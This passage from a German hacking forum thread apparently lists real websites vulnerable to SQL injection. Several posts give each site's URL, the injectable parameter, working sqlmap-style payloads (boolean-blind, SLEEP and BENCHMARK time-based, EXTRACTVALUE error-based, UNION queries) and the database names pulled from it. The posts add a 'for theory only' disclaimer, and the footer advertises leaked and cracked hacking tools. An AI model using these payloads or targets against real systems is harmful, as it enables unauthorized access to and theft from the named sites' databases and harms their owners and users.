    Payload: p=aktuellm' AND EXTRACTVALUE(7498,CONCAT(0x5c,0x716a626a71,(SELECT (CASE WHEN (7498=7498) THEN 1 ELSE 0 END)),0x716b6b7a71)) AND 'jxmk'='jxmk&n=28&j=2008

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: p=aktuellm' AND (SELECT * FROM (SELECT(SLEEP(5)))Xcff) AND 'qcYl'='qcYl&n=28&j=2008
---
back-end DBMS: MySQL 5.1
available databases [1]:
[*] www325b


 

http://www.z-zero.de/url.php?url=www.selectsmart.com/FREE/select.php?client=Haru

Parameter: url (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: url=www.selectsmart.com/FREE/select.php?client=Haru' AND 2173=2173 AND 'HVsP'='HVsP

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: url=www.selectsmart.com/FREE/select.php?client=Haru' AND (SELECT * FROM (SELECT(SLEEP(5)))SXcI) AND 'UVdl'='UVdl
---
web application technology: Apache 2.2.29
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] ssmart_last


 

http://www.tuerkei-einmal-anders.de/hotel.php?id_hotel=147

Parameter: id_hotel (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: id_hotel=147 RLIKE (SELECT (CASE WHEN (5151=5151) THEN 147 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id_hotel=147 AND (SELECT 4528 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT (CASE WHEN (4528=4528) THEN 1 ELSE 0 END)),0x71717a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 67 columns
    Payload: id_hotel=147 UNION ALL SELECT NULL,NULL,CONCAT(0x71786b6a71,0x64646b4f657a6c70696e,0x71717a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache 2.2.29, PHP 5.3.29
back-end DBMS: MySQL 5.0
available databases [2]:
[*] DB185928
[*] information_schema


Alle Angaben und Informationen dienen lediglich der Theorie!

#4
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert

http://www.iceland.de/fileadmin/template/iceland/click_veranst.php?id=61

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=61' AND 6873=6873 AND 'BGyg'='BGyg

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=-9787' UNION ALL SELECT CONCAT(0x7170626b71,0x4a686261517167484a74,0x7176716a71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=61' AND SLEEP(5) AND 'KNbl'='KNbl
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] db1685525051
[*] information_schema


Alle Angaben und Informationen dienen lediglich der Theorie!

#5
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert
http://www3.w-hs.de/JPR/lro/bp_neu.php?id=9
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=9 RLIKE (SELECT (CASE WHEN (4018=4018) THEN 9 ELSE 0x28 END))

Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=9 AND 3289=BENCHMARK(5000000,MD5(0x4871525a))

Type: UNION query
Title: Generic UNION query (random number) - 5 columns
Payload: id=9 UNION ALL SELECT 9646,9646,9646,CONCAT(0x7162787a71,0x6d616156717458477248,0x7178627071),9646--
---
web server operating system: Linux SuSE 9.3
web application technology: PHP 4.3.10, Apache 2.0.53
back-end DBMS: MySQL <5.0.11
available databases [1]:
[*] JPR

Sind mehr DBs ich war zu Faul da weiter zu schauen ;)
Alle Angaben und Informationen dienen lediglich der Theorie!



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 141 user(s)


    , , !false, <cerrno>, 2242, adn1337, adramax, ADTHENET, Amphe1337, and6578, ardamax, ASR, B1nary, Barney1, BayernFox, bbxhnr, Becks, BlackZetsu, bloodgear, BobbyRastaWS, Bornload, Bypass, byte, can, CD3F, Ch!ller, chick0n, chimchoca7, Cocarando, connecting, cooky1, Cranky, Crap, Cube, DarkICE, desmond, domiya1337, Dr. Spic, DR.zydz, easysurfer, Emalik Xantier, Erikson, eXalT, Exynos, FalkE, fAYe, felix819, ferithan, Framerater, frechdax, Freshness28, funstyler, ghost12, Goooofy, gtawelt, h04x, hacked, harlek1n, huttler, ice, iggl, igorborisvas, Injection, Irhabi, isi, iSplash0, jabba, Jauteng, johny758, kalixa, keyb0ardz, kingcrackzzz, kpakpando, KrankenHaus, Krzysztof, L33toe, Laggy, lamaamala, lion., lNobodyl, lolorollo, LyXz, Mantrayana, mdwd, mettbrot, MiD_NiGHT, milton3453, most_uniQue, MrMongolo, n1nja, nikez, nninja, Nordlicht, Norky, nortorn, notfound, Nova, OBEY, omeralex, omnicrunch, p0pc0rn, parasilent, PaulaAbdul, pdr0, pekelhc, PHIPU, pisse32, pornoralle, pr0legend, R3s1stanc3, r3vO, riki-r0ki, RudolfAntal, rzX0R, saske46, SavE1, Schnee, smc2014, Smokyjoe, Spreadtheworld, subtleopt, T00LStar, teekoppe, the.3nd, Toolbase, Tortschi, UDXR, ueEqlL, umarex, Unkiii, VeqasZ, VIP3R, vôl, weedneger77, White-Warti, Xenio, Xenos88, xFAUSTx, XoiL, zepsus, Zlappost837
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.